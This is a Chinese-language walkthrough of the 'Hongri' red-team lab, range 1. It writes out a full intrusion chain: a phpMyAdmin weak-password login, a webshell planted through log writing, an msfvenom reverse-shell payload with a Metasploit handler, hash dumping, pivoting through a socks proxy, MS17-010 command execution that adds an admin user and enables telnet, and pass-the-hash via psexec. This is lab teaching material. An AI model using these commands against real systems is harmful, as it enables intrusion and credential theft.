红日靶场攻克笔记一

靶场拓扑图

靶机环境分别为win7（外网）、win2008、win2003

win7：192.168.100.101 win2008:192.168.52.138 win2003:192.168.52.141 kali:192.168.100.246

web****渗透：

nmap扫描主机查看端口服务开放情况 发现开放了80端口的web服务和3306端口的mysql服务，对站点进行目录扫描 扫描发现了phpMyAdmin目录，访问弱口令root/root直接登录 进入后再sql语句执行处检查写入权限，发现并不支持写入 查看日志记录情况，发现日志也未开启 使用语句开启日志并设置日志记录到php文件 再次查询，修改成功 写入php一句话木马 蚁剑连接，发现是管理员权限，且存在域，判断域存在与否有很多方法，总结下几种常用的:

1、net time /domain   通过域控授时，若不存在域会显示找不到域控制器 2、ipconfig /all  若存在域则主DNS是域名 3、systeminfo   若存在域再域的一行会显示域名，否则会显示WORKGROUP

内网渗透： 进入kali，使用msf模块制作木马，这里的马子没有作免杀要注意关闭杀毒软件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.246 LPORT=4444 -f exe > /test.exe 利用蚁剑上传 在msf板块开启监听，利用蚁剑执行上线

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lport 4444 set lhost 192.168.100.246 exploit -j

首先尝试getsystem提权，成功拿到system权限，这里也可以使用cs提权ms14_058，经测试也可以拿到权限 抓取用户hash值（需要system权限）

run hashdump

得到hash:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

ipconfig时发现192.168.52.0网段 尝试对52网段进行扫描，发现有存活机器

run arp_scanner -r 192.168.52.0/24

为方便进行信息收集，我们先建立一条对52网段的路由，设置端口1080，版本为4a，使用proxychains进行代理

run autoroute -s 192.168.52.0/24   查看路由表 run autoroute -p                                  检查路由表 background                                           返回 use auxiliary/server/socks_proxy   使用代理模块 set srvport 1080                                   设置端口 set version 4a                                        设置版本 run

配置kali socks代理，编辑/etc/proxychains4.conf，在[ProxyList]添加一条socks代理 0.0.0.0 1080         代理所有来自1080端口的流量 使用proxychains代理curl 192.168.52.138主机，得到回显说明我们代理配置成功 扫描常见端口

proxychains4 nmap -sT -Pn -p 20,21,22,23,24,25,80,443,445,3306,3389 192.168.52.141

扫描ms17-010，发现存在漏洞 尝试进一步利用，选择比较稳定的command利用模块，尝试执行net user执行成功

use auxiliary/admin/smb/ms17_010_command set COMMAND net user set rhost 192.168.52.141 exploit

添加用户

set COMMAND net user first yyds@123 /add

添加成功 把添加的用户加入管理员组

set COMMAND net localgroup administrators first /add

加入成功 尝试开启telnet服务

set COMMAND sc config tlntsvr start= auto set COMMAND net start telnet

开启成功 nmap扫描确认23端口开启

proxychains4 nmap -sT -Pn -p 23 192.168.52.141

本地连接telnet服务，输入刚才创建的账户登录，拿到141主机的shell 按照上面的方法同样我们也可以拿到138的域控主机，另外因为几台主机密码都一样所以也可以使用hash传递攻击，使用hash传递时要注意使用正向连接，因为138主机是不出网的

use exploit/windows/smb/psexec set payload windows/meterpreter/bind_tcp set lhost 192.168.100.246 set rhost 192.168.52.138 set smbuser 账户名 set smbpass LM:NTLM exploit

这里还有一个问题就是我在hash传递时使用msf hashdump出来的hash是报错的,可能是模块有点问题 于是我是用cs重新抓取了下hash，在msf中重新设置smbpass

set smbpass f26fb3ae03e93ab9c81667e9d738c5d9:b367819c0a8ccd792cad1d034f56a1fa

成功拿到138主机的shell，登录发现已经是system权限

总结:

靶场1考察比较基础的内网知识，需要掌握各操作系统的指令、经典的漏洞以及msf等工具的使用。